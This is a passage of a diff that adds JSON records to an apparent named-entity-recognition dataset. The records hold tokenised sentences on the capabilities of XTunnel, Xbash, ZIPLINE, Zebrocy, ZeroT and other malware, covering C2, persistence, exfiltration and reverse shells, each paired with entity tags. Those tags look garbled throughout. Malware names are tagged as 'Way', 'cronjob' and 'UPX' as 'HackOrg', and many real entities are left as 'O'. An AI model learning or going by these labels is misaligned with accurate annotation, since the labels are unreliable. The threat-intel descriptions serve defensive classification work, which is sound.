"of", + "a", + "specific", + "file,", + "<code>.report</code>.", + "After", + "the", + "elapsed", + "time,", + "XCSSET", + "executes", + "additional", + "modules." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XCSSET", + "uses", + "a", + "shell", + "script", + "to", + "execute", + "Mach-o", + "files", + "and", + "<code>osacompile</code>", + "commands", + "such", + "as,", + "<code>osacompile", + "-x", + "-o", + "xcode.app", + "main.applescript</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XTunnel", + "uses", + "SSL/TLS", + "and", + "RC4", + "to", + "encrypt", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "A", + "version", + "of", + "XTunnel", + "introduced", + "in", + "July", + "2015", + "inserted", + "junk", + "code", + "into", + "the", + "binary", + "in", + "a", + "likely", + "attempt", + "to", + "obfuscate", + "it", + "and", + "bypass", + "security", + "products." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Time", + "I-Time", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XTunnel", + "is", + "capable", + "of", + "accessing", + "locally", + "stored", + "passwords", + "on", + "victims." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "C2", + "server", + "used", + "by", + "XTunnel", + "provides", + "a", + "port", + "number", + "to", + "the", + "victim", + "to", + "use", + "as", + "a", + "fallback", + "in", + "case", + "the", + "connection", + "closes", + "on", + "the", + "currently", + "used", + "port." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XTunnel", + "is", + "capable", + "of", + "probing", + "the", + "network", + "for", + "open", + "ports." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "version", + "of", + "XTunnel", + "introduced", + "in", + "July", + "2015", + "obfuscated", + "the", + "binary", + "using", + "opaque", + "predicates", + "and", + "other", + "techniques", + "in", + "a", + "likely", + "attempt", + "to", + "obfuscate", + "it", + "and", + "bypass", + "security", + "products." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Time", + "I-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XTunnel", + "relays", + "traffic", + "between", + "a", + "C2", + "server", + "and", + "a", + "victim." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "XTunnel", + "has", + "been", + "used", + "to", + "execute", + "remote", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "create", + "a", + "cronjob", + "for", + "persistence", + "if", + "it", + "determines", + "it", + "is", + "on", + "a", + "Linux", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "has", + "destroyed", + "Linux-based", + "databases", + "as", + "part", + "of", + "its", + "ransomware", + "capabilities." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "has", + "maliciously", + "encrypted", + "victim's", + "database", + "systems", + "and", + "demanded", + "a", + "cryptocurrency", + "ransom", + "be", + "paid." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "obtain", + "a", + "webpage", + "hosted", + "on", + "Pastebin", + "to", + "update", + "its", + "C2", + "domain", + "list." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "attempt", + "to", + "exploit", + "known", + "vulnerabilities", + "in", + "Hadoop,", + "Redis,", + "or", + "ActiveMQ", + "when", + "it", + "finds", + "those", + "services", + "running", + "in", + "order", + "to", + "conduct", + "further", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "download", + "additional", + "malicious", + "files", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "execute", + "malicious", + "JavaScript", + "payloads", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "use", + "mshta", + "for", + "executing", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "perform", + "port", + "scanning", + "of", + "TCP", + "and", + "UDP", + "ports." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "obtain", + "a", + "list", + "of", + "weak", + "passwords", + "from", + "the", + "C2", + "server", + "to", + "use", + "for", + "brute", + "forcing", + "as", + "well", + "as", + "attempt", + "to", + "brute", + "force", + "services", + "with", + "open", + "ports." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "use", + "scripts", + "to", + "invoke", + "PowerShell", + "to", + "download", + "a", + "malicious", + "PE", + "executable", + "or", + "PE", + "DLL", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "create", + "a", + "Startup", + "item", + "for", + "persistence", + "if", + "it", + "determines", + "it", + "is", + "on", + "a", + "Windows", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "use", + "regsvr32", + "for", + "executing", + "scripts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "collect", + "IP", + "addresses", + "and", + "local", + "intranet", + "information", + "from", + "a", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "can", + "execute", + "malicious", + "VBScript", + "payloads", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Xbash", + "uses", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "YAHOYAH", + "decrypts", + "downloaded", + "files", + "before", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "YAHOYAH", + "encrypts", + "its", + "configuration", + "file", + "using", + "a", + "simple", + "algorithm." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "YAHOYAH", + "uses", + "HTTP", + "GET", + "requests", + "to", + "download", + "other", + "files", + "that", + "are", + "executed", + "in", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "YAHOYAH", + "checks", + "for", + "antimalware", + "solution", + "processes", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "YAHOYAH", + "checks", + "for", + "the", + "system’s", + "Windows", + "OS", + "version", + "and", + "hostname." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "YAHOYAH", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIPLINE", + "can", + "add", + "itself", + "to", + "the", + "exclusion", + "list", + "for", + "the", + "Ivanti", + "Connect", + "Secure", + "Integrity", + "Checker", + "Tool", + "if", + "the", + "`--exclude`", + "parameter", + "is", + "passed", + "by", + "the", + "`tar`", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIPLINE", + "can", + "find", + "and", + "append", + "specific", + "files", + "on", + "Ivanti", + "Connect", + "Secure", + "VPNs", + "based", + "upon", + "received", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIPLINE", + "can", + "download", + "files", + "to", + "be", + "saved", + "on", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIPLINE", + "can", + "communicate", + "with", + "C2", + "using", + "a", + "custom", + "binary", + "protocol." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "ZIPLINE", + "can", + "identify", + "running", + "processes", + "and", + "their", + "names." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIPLINE", + "can", + "create", + "a", + "proxy", + "server", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIPLINE", + "can", + "use", + "AES-128-CBC", + "to", + "encrypt", + "data", + "for", + "both", + "upload", + "and", + "download." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIPLINE", + "can", + "identify", + "a", + "specific", + "string", + "in", + "intercepted", + "network", + "traffic,", + "`SSH-2.0-OpenSSH_0.3xx.`,", + "to", + "trigger", + "its", + "command", + "functionality." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZIPLINE", + "can", + "use", + "`/bin/sh`", + "to", + "create", + "a", + "reverse", + "shell", + "and", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "ZLib", + "backdoor", + "compresses", + "communications", + "using", + "the", + "standard", + "Zlib", + "compression", + "library." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "ZLib", + "has", + "sent", + "data", + "and", + "files", + "from", + "a", + "compromised", + "host", + "to", + "its", + "C2", + "servers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZLib", + "has", + "the", + "ability", + "to", + "enumerate", + "files", + "and", + "drives." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ZLib", + "has", + "the", + "ability", + "to", + "download", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ZLib", + "mimics", + "the", + "resource", + "version", + "information", + "of", + "legitimate", + "Realtek", + "Semiconductor,", + "Nvidia,", + "or", + "Synaptics", + "modules." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "ZLib", + "has", + "the", + "ability", + "to", + "obtain", + "screenshots", + "of", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZLib", + "has", + "the", + "ability", + "to", + "enumerate", + "system", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ZLib", + "has", + "the", + "ability", + "to", + "discover", + "and", + "manipulate", + "Windows", + "services." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ZLib", + "communicates", + "over", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "ZLib", + "has", + "the", + "ability", + "to", + "execute", + "shell", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "ZLib", + "creates", + "Registry", + "keys", + "to", + "allow", + "itself", + "to", + "run", + "as", + "various", + "services." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "has", + "used", + "a", + "method", + "similar", + "to", + "RC4", + "as", + "well", + "as", + "AES", + "for", + "encryption", + "and", + "hexadecimal", + "for", + "encoding", + "data", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "uses", + "SSL", + "and", + "AES", + "ECB", + "for", + "encrypting", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "scans", + "the", + "system", + "and", + "automatically", + "collects", + "files", + "with", + "the", + "following", + "extensions:", + ".doc,", + ".docx,", + ",.xls,", + ".xlsx,", + ".pdf,", + ".pptx,", + ".rar,", + ".zip,", + ".jpg,", + ".jpeg,", + ".bmp,", + ".tiff,", + ".kum,", + ".tlg,", + ".sbx,", + ".cr,", + ".hse,", + ".hsf,", + "and", + ".lhz." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Zebrocy", + "installs", + "an", + "application-defined", + "Windows", + "hook", + "to", + "get", + "notified", + "when", + "a", + "network", + "drive", + "has", + "been", + "attached,", + "so", + "it", + "can", + "then", + "use", + "the", + "hook", + "to", + "call", + "its", + "RecordToFile", + "file", + "stealing", + "method." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "has", + "the", + "capability", + "to", + "upload", + "dumper", + "tools", + "that", + "extract", + "credentials", + "from", + "web", + "browsers", + "and", + "store", + "them", + "in", + "database", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "decodes", + "its", + "secondary", + "payload", + "and", + "writes", + "it", + "to", + "the", + "victim’s", + "machine.", + "Zebrocy", + "also", + "uses", + "AES", + "and", + "XOR", + "to", + "decrypt", + "strings", + "and", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "has", + "exfiltrated", + "data", + "to", + "the", + "designated", + "C2", + "server", + "using", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "has", + "a", + "command", + "to", + "delete", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "searches", + "for", + "files", + "that", + "are", + "60mb", + "and", + "less", + "and", + "contain", + "the", + "following", + "extensions:", + ".doc,", + ".docx,", + ".xls,", + ".xlsx,", + ".ppt,", + ".pptx,", + ".exe,", + ".zip,", + "and", + ".rar.", + "Zebrocy", + "also", + "runs", + "the", + "<code>echo", + "%APPDATA%</code>", + "command", + "to", + "list", + "the", + "contents", + "of", + "the", + "directory.", + "Zebrocy", + "can", + "obtain", + "the", + "current", + "execution", + "path", + "as", + "well", + "as", + "perform", + "drive", + "enumeration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "obtains", + "additional", + "code", + "to", + "execute", + "on", + "the", + "victim's", + "machine,", + "including", + "the", + "downloading", + "of", + "a", + "secondary", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "stores", + "all", + "collected", + "information", + "in", + "a", + "single", + "file", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "performs", + "persistence", + "with", + "a", + "logon", + "script", + "via", + "adding", + "to", + "the", + "Registry", + "key", + "<code>HKCU\\Environment\\UserInitMprLogonScript</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "uses", + "SMTP", + "and", + "POP3", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "identifies", + "network", + "drives", + "when", + "they", + "are", + "added", + "to", + "victim", + "systems." + ], + "ner_tags": [ + "B-Time", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "enumerates", + "information", + "about", + "connected", + "storage", + "devices." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "uses", + "the", + "<code>tasklist</code>", + "and", + "<code>wmic", + "process", + "get", + "Capture,", + "ExecutablePath</code>", + "commands", + "to", + "gather", + "the", + "processes", + "running", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "executes", + "the", + "<code>reg", + "query</code>", + "command", + "to", + "obtain", + "information", + "in", + "the", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "creates", + "an", + "entry", + "in", + "a", + "Registry", + "Run", + "key", + "for", + "the", + "malware", + "to", + "execute", + "on", + "startup." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "has", + "a", + "command", + "to", + "create", + "a", + "scheduled", + "task", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "variant", + "of", + "Zebrocy", + "captures", + "screenshots", + "of", + "the", + "victim’s", + "machine", + "in", + "JPEG", + "and", + "BMP", + "format." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Idus", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy's", + "Delphi", + "variant", + "was", + "packed", + "with", + "UPX." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Zebrocy", + "has", + "used", + "URL/Percent", + "Encoding", + "on", + "data", + "exfiltrated", + "via", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "collects", + "the", + "OS", + "version,", + "computer", + "name", + "and", + "serial", + "number", + "for", + "the", + "storage", + "volume", + "C:\\.", + "Zebrocy", + "also", + "runs", + "the", + "<code>systeminfo</code>", + "command", + "to", + "gather", + "system", + "information." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "runs", + "the", + "<code>ipconfig", + "/all</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "uses", + "<code>netstat", + "-aon</code>", + "to", + "gather", + "network", + "connection", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "gets", + "the", + "username", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "gathers", + "the", + "current", + "time", + "zone", + "and", + "date", + "information", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "uses", + "HTTP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Zebrocy", + "uses", + "cmd.exe", + "to", + "execute", + "commands", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "One", + "variant", + "of", + "Zebrocy", + "uses", + "WMI", + "queries", + "to", + "gather", + "information." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "ZeroT", + "has", + "obfuscated", + "DLLs", + "and", + "functions", + "using", + "dummy", + "API", + "calls", + "inserted", + "between", + "real", + "instructions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Many", + "ZeroT", + "samples", + "can", + "perform", + "UAC", + "bypass", + "by", + "using", + "eventvwr.exe", + "to", + "execute", + "a", + "malicious", + "file." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZeroT", + "has", + "used", + "DLL", + "side-loading", + "to", + "load", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZeroT", + "shellcode", + "decrypts", + "and", + "decompresses", + "its", + "RC4-encrypted", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZeroT", + "has", + "encrypted", + "its", + "payload", + "with", + "RC4." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZeroT", + "can", + "download", + "additional", + "payloads", + "onto", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "ZeroT", + "DLL", + "files", + "have", + "been", + "packed", + "with", + "UPX." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SecTeam", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "ZeroT", + "has", + "retrieved", + "stage", + "2", + "payloads", + "as", + "Bitmap", + "images", + "that", + "use", + "Least", + "Significant", + "Bit", + "(LSB)", + "steganography." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZeroT", + "has", + "used", + "RC4", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ZeroT", + "gathers", + "the", + "victim's", + "computer", + "name,", + "Windows", + "version,", + "and", + "system", + "language,", + "and", + "then", + "sends", + "it", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + 